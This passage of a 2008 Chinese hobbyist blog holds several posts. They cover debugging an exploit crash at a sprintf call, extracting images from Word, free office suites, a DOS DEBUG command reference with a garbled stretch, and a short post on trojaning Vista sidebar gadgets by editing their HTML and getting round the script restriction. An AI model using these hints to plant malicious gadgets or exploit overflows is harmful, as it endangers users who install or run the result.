如果用python写exp的话你会很郁闷，因为py总是会给偶多出一个换行，就算使用[:-1]这种方法也没用，郁闷，目前不清楚是传递的过程还是print的时候，谁知道是什么原因？
23132D09 50 push eax
23132D0A FF15 54E51323 call dword ptr [<&MSVCRT.sprintf>] ; crash
23132D10 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4]
就是在执行这步sprintf函数复制的时候导致crash。

快速提取Word中的图片

Tue, 06 May 2008 12:26:08 +0800

今天在做一个PPT，想到了一个素材，记得是在一个Word中，马上打开这个Word，和平常一样直接复制，奇怪是，我复制过去的是一个白底图片，只有一个大红X。

这下把我郁闷了，咋就不能复制了？郁闷的我，把Wrod的图片选项打开看了又看，什么都没有啊。于是就把Word的选项打开看，刚打开文件，眼前一亮，看到了另存为网页，一个邪恶想法出现了。

立马打开文件，另存为，把文件另存为了网页，到目录一看，多了一个文件名.file的文件夹，打开一看，HOHO，不都是这个Word文档中的图片，这以后可就又多了一个“盗版”的方法。

另外，我还不知道那个word中的图片是怎么做成那样的，那位知道，给我留个言。

点备案号边上的给我留言，或地址：
http://v3.tongji.cn.yahoo.com/note.html?unit_id=12713&url=http%3A//www.woidiy.com/blog/default.asp

6大免费Office办公套件

Mon, 05 May 2008 14:56:33 +0800

微软的Office办公套件是市场上占有率最高的办公软件,可是这款商业软件价格昂贵,正版对于大多数国内电脑用户来说都无法承受.不过近些年来MS Office的竞争对手也越来越多,而且产品质量上也有长足的进步,许多在功能上还有可喜的创新.下面是比较流行的6大Office办公套件,包括在线和桌面两种类型.

在线版免费办公套件

1.Google Docs

Google的在线Office套件也许是MS Office最大的竞争对手,在Google前不久发布了Google Presentation之后,电子文档,电子表格和演示文稿三大套件悉数到齐,可谓一个里程碑.Google Docs也可以说是目前质量最好的在线Office套件.

2.Zoho

Zoho是一个专注在线办公应用程序的网站,旗下的产品是几大在线办公软件提供商中最完整的一个.前不久还发布了Zoho DB,一个在线数据库管理软件.

3.ThinkFree

ThinkFree最大的特点是和MS Office的兼容性和界面的相似性.同时具有非常不错的协作功能.

桌面版免费办公套件

4.StarOffice

Sun出品的Office办公套件,能够通过Google Pack下载免费版本.StarOffice支持Windows,Linux和Solaris,Mac下需要下载StarOffice的师兄Open Office.

5.IBM Lotus Symphony

IBM前不久发布的Office办公套件,针对个人和企业用户.拥有Office最常见的三大套件.

6.OpenOffice

Linux下最流行的OpenOffice是一个跨平台多语言的Office套件,和MS Office有着较好的兼容性,包括Writer,Impress(演示文稿),Math,Draw,Calc(电子表格)和Base(数据库). StarOffice和IBM Lotus Symphony都是基于OpenOffice的源代码开发而成.

来自MakeUseOf

Vista侧边栏也可以挂马？！

Sat, 26 Apr 2008 09:37:14 +0800

喜欢炫酷的朋友们小心了，你是不是很喜欢定制自己的vista侧边栏？但是这个东东是可以插入XX的。

侧边栏小程序是gadget格式的，看了MSDN的和一些相关的资料，用zip格式的压缩软件就能读取并修改内容的，在微软官方下来给Google的小插件（http://vista.gallery.microsoft.com/vista/SideBar.aspx?mkt=zh-cn ），用7-zip打开看看里面是啥？

550)this.width=550;" />

看到了吗？无语了，就是一些简单的web文件构成的，F4编辑那个Google.html，在body下随便写个框架

然后用7-zip保存，双击安装。

550)this.width=550;" />

再次无语，不过微软没那么傻X，是不能直接运行JS的，但是稍微绕个弯子就可以：）YY下，这种缺陷其实也挺傻X的，一个愿打，一个愿挨嘛。

神秘的 DEBUG 命令行参数详解

Sat, 26 Apr 2008 09:35:41 +0800

DEBUG
命令行参数形式：
格式：DEBUG [[驱动器号:][路径]文件名 [调试参数]]
用途：debug将所指定文件装入内存，显示提示符“-”等待进一
步命令。若装入文件为.exe文件，按照重定位原则装入为可执行状态
。.com文件类似。若为其它类型文件则直接进行内存映射，由偏移量
100H原封不动读入内存。
debug将在缓冲区为被调试程序建立适当的PSP（程序段前缀，
Program Segment Prefix）。在PSP中的偏移量80H为命令行的末尾。
而且在偏移量5CH和6CH由包含参数后面的可选参数构成缺省的FCB（
文件控制块，File Control Block）。
进入时各寄存器初使情况：
寄存器 .com程序 .exe程序
AX 指定驱动器错误码指定驱动器错误码
BX 程序空间的高地址程序空间的高地址
CX 程序空间的低地址程序空间的低地址
DX 0 0 SI 0 0
DI 0 0
BP 0 0
SP 0FFFFH或可利用的不定
内存空间上限减2
IP 100H 目标程序的的代码
入口偏移量
CS PSP 目标程序代码段址
DS PSP PSP
CS PSP PSP
SS PSP 目标程序堆栈段底
命令：
A: 编写汇编代码（Assemble）
格式：A[地址]
用途：程序允许在指定位置（若无缺省为IP指针位置）进行汇编
程序书写。
细节：
*所有数值皆为十六进制整数，数值后不带“H”
*不支持文件管理用的目录表、宏标记、条件汇编
*跳转指令后要直接书写十六进制地址不支持标号
*数据类型若非默认类型，要以PTR加以指定
*字符串操作要指定类型为B或W（如lodsb和lodsw等）及长度
*用DB和DW接受数据定义，直按进行汇编
*对内存地址加[]以与立即数区分

C: 内存内容比较（Compare）
格式：C 地址范围地址
地址范围：做比较的第一个内存域始未地址或始地址和长度
地址：做比较的第二个内存域的始地址
用途：*对内存中两个域的内容加以比较，以字节为单位。对发现有
差别的内容及其地址用如下形式显示出：
地址1 始位置未位置地址2
*若地址范围或地址不含段地址，默认为DS的值。
D: 显示内存内容（Dump）
格式：D[地址范围]
地址范围：给定显示区的始未范围或始地址和长度。
用途：*内存内容显示指令，以十六进制和ASCII码形式显示指定范
围内的内存内容。
*若不指定范围，第一次按目标程序的CS：IP的位址开始显示。
以后使用上次显示的未地址的下一地址为开始进行显示。
*若不指定长度，则显示128byte的内容。计8行。

E: 数据的输入
格式：E 地址数值列表
地址：数据输入的内存始地址
数值列表：从始地址输入的连续数据
用途：*向内存区域输入数据。数据以十六进制形式，或以ASCII码形式
均可。覆盖掉原有数据。
*十六进制时要用空格、逗号或制表符加以分隔。字符串则要用单
引号或双引号括起且区分大小写。
*若不指写段址，则默认为DS中值。每写完一数据地址自动增加。
*如省略数值列表，对应每一字节请求输入。点号前为该字节原
始值，点号后请求输入。这时若按空格，跳过这一字节；按回车，
结束输入；按减号或连字符，显示前一字节内容。
　　　　 *出错时内存内容有可能已被改变。提示后终止。
*字符串只能以数值列表的形式输入，不能按地址提式输入。

F: 内存填充（Fill）
格式：F 地址范围　数值列表
　　　　地址范围：数据输入的内存始本地址或首地址和长度
数值列表：从始地址输入的连续数据
　用途：*将列表中数据写入内存。输入数据以十六进制或ASCII码形式。
　　　　覆盖原有信息；若出错，显示出错信息，原有信息保留。
　　　　 *若未指写段址，默认为DS寄存器值。
　　　　 *列表中可有十六进制或字符串两种形式，各内容用空格、逗号、
　　　　制表符隔开。字符串必须以单引号或双引号括起，区分大小写。
　　　　 *若要填充区域大于数据数目，列表可重复使用；相反，若列表
　　　　比要填充区域大时，则自动截断后面的数据。

G: 程序执行（Go）
格式：G[=地址][断点0][……断点]
地址： Debug开始执行的地址。
断点0……断点9：指定的0—10个临时中断点。
用途：*将CPU控制权由Debug转移给被调试中的程序。不设断点时，则程
序的执行或是中途失败蚴钦＝崾＝崾保崾居小癙rogram
termminated nomally”，即程序结束正常，控制权再返回到
Debug。
*此时因数据有可能重写，若需再次执行，因重新装入。
*地址中，如未指定段址，则使用目标程序的CS寄存器中的值。当
地址省略时，则Debug使用目标程序的CS:IP寄存器的值开始执行。
且为与断点区分，地址参数前必须加等号，否则将其认为是第零
个断点。
*断点参数可指定10个临时断点。当程序执行到指定的断点地址时
则发生中止。与断点表内的次序无关，断点可按任意次序输入。
*中止时，将会显示寄存器的内容、标志位状态及CS:IP指出的指
令（也就是下一条将要执行的指令），然后是提示符“-”。
*若没有装入可执行程序或程序内容未知，有可能进入死状态。
*若目标程序的栈不起作用或太小，则可能引起系统“破碎”。

H: 执行十六进制算术运算（Hexadecimal）
格式：H 值1 值2
值1、2为0—FFFFH范围内的任意十六进制数。
用途：*用来求两个十六进制数的和、差，对结果显示为值1+值2及值1-
值2。如果值2 > 值1则显示其补码。
*虽然很少用，但事实还是很有用的，熟练掌握。

I: 端口的输入（Input）
格式：I 端口地址
端口地址：0—FFFF范围内的I/O端口地址。
用途：用来读取指定I/O端口地址，并以2位十六进制数加以显示。
警告：I指令将直接访问计算机硬件，不是所以错误检查都能进行，所以
使用是必须小心。对某个外设控制器分配端口的输入操作，可能
干涉系统固有的操作。对没有分配指定I/O端口的设备，或该端口
为写入专用端口等情况，I命令都不能保证可显示。

L: 装入命令（Load）
格式：L 地址
或
L 地址驱动器开始扇区扇区数
地址：存放从盘中读出数据的内存地址。
驱动器： A=0, B=1, C=2, 以此类推。
开始扇区：以十六进制数表示要最先装入的逻辑扇区号。
扇区数：以十六进制数表示要装入连续扇区个数。
用途：*若输入了一个不完全的L命令时，则对下述磁盘文件进行装入：
1在Debug命令行中指定过的文件；
2由命令末尾参数N指定的文件。
*在地址中若未指定段址，则使用CS中的值。若为可执行文件按重
定位原则装入为可执行状态。
*装入后文件长度，或.exe文件程序的实际长度放入目标程序的BX
和CX两个寄存器中。高十六位放在BX中。
*若在命令行中给出所有参数，则不必用MS-DOS的文件系统访问磁
盘。

M: 数据传送（Move）
格式：M 地址范围地址
地址范围：被复制域的始末地址，或始地址和长度。
地址：数据复制目的域的起始地址。
用途：*对内存中数据进行复制。目的域被覆盖。
*若地址范围中无段址，则使用DS内容；若地址中无段址，使用地
址范围中的值。

N: 文件名或命令末尾的参数（Name）
格式：N 参数 [参数……]
参数：插入到仿真的PSP中去一个以上的文件名或者是开关项。
用途：*对磁盘读写操作L、W指定目标文件。

O: 端口的输出（Output）
格式：O 端口字节
端口：I/O端口地址。
字节：写入I/O端口的0—FFFF范围的值。
用途：向I/O端口地址写入一字节。
警告：错误的操作将导致系统崩溃。

P: 循环或子程序处理（Procedure）
格式：P[=地址] [命令数]
地址：执行的起始地址。
指令数：执行的指令条数。
用途：*循环或子程序处理。将循环、串指令、软件中断或子程序调用
视为单语句。执行中了，显示目标程序寄存器内容、标志位状态
和下一条要执行的指令。
*若地址参数中无段址，则使用CS中的值。完全忽略地址时，则从
程序中的CS:IP指定位置开始执行。

Q: 结束Debug操作（Quit）
格式：Q
用途：程序结束返回。对未保存的结果丢失。

R: 寄存器显示与更改（Register）
格式：R [寄存器]
寄存器：AX BX CX DX SP BP SI DI
DS ES CS IP PC
F
用途：*若R不带参数，则显示所有寄存器的内容和状态标志、下一指令。
*若指定新值，在显示内容后，给出冒句提示输入新值。回车结束。
*对状态字F，在连字符“-”后以空格间隔输入新值，次序不计。
*若直接回车，则跳过修改，寄存器内容不变。

S: 内存检索（Search）
格式：S 地址范围列表
地址范围：想来你该明白是什么样了吧：）
列表：欲检索的一个以上的字节值或字符串。
用途：*在指定的内存范围内检索列表的值。对每一个匹配的地址进行
显示。
*若起地址中无段址，默认为DS的值。
*检索范围不得大于FFFFH
*列表必须以分隔符（空格，逗号，制表符等）分隔；字符串要加
单引号或双引号括起，区分大小写。

T: 程序执行跟踪（Trace）
格式：T[=地址][指令数]
地址：执行的第一条指令的地址。
指定数：执行的机器指令的条数。
用途：*执行单条指令，显示寄存器及下一条指令。
*在地址参数中若无段址，则默认为CS寄存器的值。
*若全部省略，则由CS:IP寄存器指出的地址开始执行。
*以后则顺序执行。
*对ROM内的跟踪应使用T命令。
警告：对Intel 8259 中断屏幕的内容（IBM PC及兼容机端口20H和21H）
的更改，或者系统功能调用（INT 21H），不能使用T指令，对上述
情况要使用P指令。

U: 反汇编（Unassemble）
格式：U [地址范围]
用途：*将机器指定解码为汇编语言的助记符。
*地址范围中无段址时，默认使用CS值。
*当始地址与实际边界不一致时，结果将不可信。
*若不含末地址或长度，则自给定始地址起反汇编32个字节。
*以后由前次U最后一指令的下一指令做32字节的反汇编。
*若从没用过U，则于CS:IP开始进行反汇编。
*只能对8086指令解码，对其它以DB来显示。

W: 写入文件或扇区（Write）
格式：W [地址]
或
W 地址驱动器开始扇区扇区数
地址：待写入盘的数据在内存中的起始位置。
驱动器：写入数据的盘的驱动器号（A=0，B=1，C=2，以下类推）。
始扇区：写入数据的最前的逻辑扇区号（0—FFFFH）。
扇区数：写入数据的连续扇区个数（0—FFFFH）。
用途：*将内存中的文件或一个个扇区传送到磁盘上。
*W若不带参数，或只有地址参数，则按BX:CX寄存器指出的字节，从内
存向磁盘写入数据。此时的文件名是此命令前最后一个使用过的文件名
，或者是N命令中指定的文件，如果没有使用过N命令，则使用Debug命
令行中指定的文件。
*Debug的W命令，不能向扩展名为.EXE或.HEX的文件中写入数据。
*这可用改扩展名的方法得到应用，让其能对.exe文件写入。
*若无地址项，则认为是目标程序的CS:0100H。
*该命令可不通过MS-DOS的文件系统直接访问磁盘的逻辑扇区。但必须
以十六进制形式给在命令行中给定各参数。
*W命令不能对用于网络上的驱动器进行逻辑扇区写入处理。
警告：若参数有误，则可能破坏盘文件结构。
请务必先搞清再作试践，特别是对硬盘的操作。